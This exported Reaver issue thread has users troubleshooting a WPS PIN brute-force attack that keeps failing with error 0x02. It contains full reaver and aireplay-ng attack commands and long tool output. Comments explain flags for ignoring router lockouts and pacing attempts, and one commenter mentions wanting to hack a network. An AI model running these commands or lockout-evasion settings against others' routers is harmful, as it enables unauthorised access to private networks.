JianliZh429 / reaver-wps

Automatically exported from code.google.com/p/reaver-wps
0 stars 0 forks source link

error 0x02 cyclic #415

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago

0. What version of Reaver are you using?  (Only defects against the latest
version will be considered.)

Reaver 1.4

1. What operating system are you using (Linux is the only supported OS)?

Backtrack 5 R3

2. Is your wireless card in monitor mode (yes/no)?

yes

3. What is the signal strength of the Access Point you are trying to crack?
-49. I am near of the router.
4. What is the manufacturer and model # of the device you are trying to
crack?

AW4062

5. What is the entire command line string you are supplying to reaver?

reaver -i mon0 -b 00:19:15:D7:39:6A -e WLAN_396A -vv

6. Please describe what you think the issue is.

I'm trying to do reaver in my router but always I get error 0x02.

7. Paste the output from Reaver below.
Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
...................
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
......
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Nothing done, nothing to save.
[+] 0.00% complete @ 2012-10-03 19:31:05 (0 seconds/pin)
[+] Trying pin 12345670
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[!] WARNING: Failed to associate with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
.................

=====================================

sudo ./walsh -i mon0 --ignore-fcs
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

BSSID   Channel       RSSI       WPS Version       WPS Locked        ESSID
--------------------------------------------------------------------------------
-

00:19:15:D7:39:6A    1  -49    1.0    No       WLAN_396A
F4:3E:61:A0:87:2F    2  -47    1.0    No     

The TCPDUMP is:
http://www.sendspace.com/file/9hmg3s

Many thanks and sorry for my english!

Original issue reported on code.google.com by davidtuti on 3 Oct 2012 at 11:51

GoogleCodeExporter commented 8 years ago
tried authenticate separately in 2 terminal:
aireplay-ng mon0 -1 5 -a <mac> -e <bssid>
reaver -i mon0 -a -b <mac> -c <channel> -vv --no-nacks --win7
in 3 terminal:
airodump mon0 -d <mac> -c <channel>
See if authentication is successful 

Original comment by deltomaf...@gmail.com on 4 Oct 2012 at 2:28

GoogleCodeExporter commented 8 years ago
Many thanks for your answer. I can associate it but I have the same 0x02 error:

+] Switching mon0 to channel 1
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
...............
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
........................
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
.......................

Original comment by davidtuti on 4 Oct 2012 at 3:37

GoogleCodeExporter commented 8 years ago
is authenticating in the terminal that has aireplay-ng mon0 -1 5 -a <mac> -e 
<bssid> ?

Original comment by deltomaf...@gmail.com on 5 Oct 2012 at 8:48

GoogleCodeExporter commented 8 years ago
Yes.
It gives me:

15:12:31  Sending Authentication Request (Open System) [ACK]
15:12:31  Authentication successful
15:12:31  Sending Association Request [ACK]
15:12:31  Association successful :-) (AID: 1)

15:12:36  Sending Authentication Request (Open System) [ACK]
15:12:36  Authentication successful
15:12:36  Sending Association Request [ACK]
15:12:40  Got a deauthentication packet! (Waiting 3 seconds)

15:12:43  Sending Authentication Request (Open System) [ACK]
15:12:43  Authentication successful
15:12:43  Sending Association Request [ACK]
15:12:43  Association successful :-) (AID: 1)

15:12:48  Sending Authentication Request (Open System) [ACK]
15:12:48  Authentication successful
15:12:48  Sending Association Request [ACK]
15:12:48  Association successful :-) (AID: 1)

15:12:53  Sending Authentication Request (Open System) [ACK]
15:12:53  Authentication successful
15:12:53  Sending Association Request [ACK]
15:12:53  Association successful :-) (AID: 1)

 CH  1 ][ Elapsed: 37 mins ][ 2012-10-06 15:46 ][ Decloak: 00:19:15:D7:39:6A                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID                                                                                                                       

 00:19:15:D7:39:6A  -36  56    21831     3987    0   1  54   WPA  TKIP   PSK  WLAN_396A                                                                                                                   

Original comment by davidtuti on 6 Oct 2012 at 1:46

GoogleCodeExporter commented 8 years ago
try:
aireplay_ng -9 mon0 
see if Injection is working for router

Original comment by deltomaf...@gmail.com on 8 Oct 2012 at 6:57

GoogleCodeExporter commented 8 years ago
Thanks 
It says me:
root@bt:~# aireplay-ng -9 mon0
22:24:57  Trying broadcast probe requests...
22:24:57  Injection is working!
22:24:59  Found 3 APs

22:24:59  Trying directed probe requests...
22:24:59  2C:B0:5D:D5:97:7F - channel: 1 - 'ONO977F'
22:25:00  Ping (min/avg/max): 2.635ms/16.090ms/62.356ms Power: -78.85
22:25:00  26/30:  86%

22:25:00  00:19:15:D7:39:6A - channel: 1 - 'WLAN_396A'
22:25:00  Ping (min/avg/max): 2.981ms/7.227ms/14.970ms Power: -31.07
22:25:00  30/30: 100%

22:25:00  F4:3E:61:A0:87:2F - channel: 2 - 'WLAN_872E'
22:25:01  Ping (min/avg/max): 2.140ms/5.637ms/16.354ms Power: -54.71
22:25:01  28/30:  93%

Original comment by davidtuti on 8 Oct 2012 at 8:25

GoogleCodeExporter commented 8 years ago
that strange, is injecting...
try so:
reaver -i mon0 -b <mac> -a -S -N -c <channel> -vv 

Original comment by deltomaf...@gmail.com on 11 Oct 2012 at 3:23

GoogleCodeExporter commented 8 years ago
Nothing,
Same error :-(

reaver -i mon0 -b 00:19:15:D7:39:6A -a -S -N -c 13 -vv

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
<cheffner@tacnetsol.com>

[+] Switching mon0 to channel 13
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[!] WARNING: 25 successive start failures
[+] Sending EAPOL START request
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x02), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Original comment by davidtuti on 11 Oct 2012 at 10:21

GoogleCodeExporter commented 8 years ago
This is a problem with Reaver.  I have had similar issues.

http://code.google.com/p/reaver-wps/issues/detail?id=406#c6

Original comment by keyfo...@veryrealemail.com on 12 Oct 2012 at 8:36

GoogleCodeExporter commented 8 years ago
So is a bug no?

Original comment by davidtuti on 12 Oct 2012 at 8:45

GoogleCodeExporter commented 8 years ago
Yes it probably is a bug, but the Reaver project has been abandoned.  Last 
update was 27 March.  If you look through the "issues" list there are many 
other unresolved problems.

I am not sure what will take over from Reaver, I think there was another 
project like it 10 months ago which prompted Reavers release I believe.

If you find anything please post back as there are many people waiting for such 
a tool.

Original comment by keyfo...@veryrealemail.com on 13 Oct 2012 at 4:31

GoogleCodeExporter commented 8 years ago
Many thanks.

Original comment by davidtuti on 13 Oct 2012 at 5:08

GoogleCodeExporter commented 8 years ago
reaver works only if the router enable WPS. WPS is somekind type of security. 
if the router disable the WPS, reaver cannot pin other number than 12345670. it 
will loop forever unless the router is yours and you need to enable the WPS 
feature.

Original comment by zizoe...@gmail.com on 21 Oct 2012 at 2:11

GoogleCodeExporter commented 8 years ago
The wps is activated. Is my router and I can see activate it

Original comment by davidtuti on 21 Oct 2012 at 6:25

GoogleCodeExporter commented 8 years ago
could configure the router with another security?
configure with Wep or another Wpa and test again Reaver

Original comment by deltomaf...@gmail.com on 23 Oct 2012 at 2:17

GoogleCodeExporter commented 8 years ago
After multiple trial and errors with the same issue I found the following steps 
helpful in getting pass this issue (note, I'm using VMWare 7.0 with Ralink USB 
adapter)

1. ifconfig down wlan0
2. physically unplug the ralink adapter
3. physically plug the ralink adapter
4. airmon-ng start wlan0
5. reaver away with your favorite settings

It seems the issue is caused by the driver interaction, and, in my case vmware. 
 Doing this works for me 1/3 of the time to resume to m3 and m4 and actually 
trying a new pin.

Best regards,

Dr. Rulo

Original comment by rulo...@gmail.com on 5 Nov 2012 at 5:00

GoogleCodeExporter commented 8 years ago
[deleted comment]
GoogleCodeExporter commented 8 years ago
@Dr. Rulo
Thanks! Took a few tries, but resulted in a successful WPS cracking attempt.

Original comment by disposab...@gmail.com on 7 Nov 2012 at 2:08

GoogleCodeExporter commented 8 years ago
In the end, what commands did you use to get it to work? I'm having the same 
issue. 

Original comment by Mr.Krato...@gmail.com on 19 Dec 2012 at 2:47

GoogleCodeExporter commented 8 years ago
I can't make it  to work.
sorry

Original comment by davidtuti on 19 Dec 2012 at 6:25

GoogleCodeExporter commented 8 years ago
Different routers have difference timeout settings. They tend to be 5 sec 15 
secs and some upto 60 secs.
This sometimes works but you may find it works for a while and then you get the 
0x02 error part way through the process:

reaver -i mon0 -c 11 -b 00:01:02:03:04:05 -vv -S -N -L -d 15 -r 3:15 -T .5 -x 
360

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 5:08

GoogleCodeExporter commented 8 years ago
"-i mon0" obviously you'll need to specifiy the interface.

"-c 11" I find that specifying the channel stops reaver from needlessly channel 
surfing in this example I used channel 11.

"-b 00:01:02:03:04:05" this is the bssid which is another required arguement in 
reaver.

"-vv" This is the verbose option. Unlike the original verbose (i.e. "-v") this 
option provides twice the orignal verbosity. I honestly prefer the "-v" option, 
since I rarely run into errors as of late.

"-S" this option instructs reaver to use small diffie-hellman secret numbers. 
These are pins that are common to most manufacturers of routers. In Switzerland 
for example, nearly all of the routers use the same standard wps pin number and 
this option checks for these kind of pins.

"-N" this is the "no nacks" option. Its one less packet to capture and can 
shorten the time it takes to crack the network.

"-L" this option ignores locks

"-d 15" This is the delay time between pin attempts. Most routers like 15 
seconds, but some are fine with 5 seconds and I've had one as high as 60 
seconds.

"-r 3:15" this says that after 3 attempts sleep for 15 seconds. This lets the 
router cool off for a bit between attacks.

"-T .5" This is the timeout period for receiving the M5 and M7 response 
message. The default timeout is 0.1 seconds. I find that using .5 seconds is 
sometimes preferred by some routers. You can set this option to as high as 1 
second.

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 5:08

GoogleCodeExporter commented 8 years ago
remember to kill processes you may have been using such as aireplay.
if your using alfa card set to max power (30dbi)
enssur your close to the router
you might not need to use the -c command (ie channel), so just delete that
this usually takes 10 to 24 + hrs so have patience

Original comment by JUSTICEN...@googlemail.com on 20 Dec 2012 at 9:44

GoogleCodeExporter commented 8 years ago
working fine with -S -N -L -d 15 -r 3:15 -T .5 -x 360...

TKS!

Original comment by javierho...@gmail.com on 30 Jun 2013 at 10:27

GoogleCodeExporter commented 8 years ago
Hello every one.
 i have found a solution to this eapol start request loop problem, that worked for me

After a lot of investigation, i found that the eapol start loop starts when we 
get deauthentication packet from the AP even after successful association.  so 
when ever i get the loop, i just associate again in separate terminal using 
aireplay-ng by one packet only, and after that, the normal working of reaver 
starts without and eapol stuck loop. Also you should slow down reaver a bit by 
setting -d 2 or -d 3 or what ever works for you. for any problem you can email 
me- sushobhit333@gmail.com

Original comment by Sushobhi...@gmail.com on 4 Sep 2013 at 7:52

GoogleCodeExporter commented 8 years ago
1)I don't have any response when i set " wash -i mon0" command
2)But when i key in "reaver" command, i can associate with the wifi(WPA TKIP 
PSK) i want to hack 
3)but it show me something like below

[+] Switching mon0 to channel 13
[+] Waiting for beacon from 00:19:15:D7:39:6A
[+] Associated with 00:19:15:D7:39:6A (ESSID: WLAN_396A)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request

Original comment by vc....@hotmail.my on 13 Sep 2013 at 3:09

GoogleCodeExporter commented 8 years ago
First use aireplay-ng to associate with the access point
Then use reaver with the "-A" argument. 
This worked for me! 

Original comment by nikhilve...@gmail.com on 25 Dec 2013 at 3:48